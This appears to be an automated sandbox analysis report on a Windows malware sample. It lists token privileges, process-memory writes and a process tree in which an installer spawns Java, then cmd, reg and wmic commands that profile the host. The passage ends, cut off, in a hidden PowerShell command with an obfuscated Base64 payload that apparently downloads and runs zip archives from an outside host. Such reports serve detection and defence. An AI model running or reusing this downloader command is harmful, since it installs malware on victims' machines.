Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2340 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 2200 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2076 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 876 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkF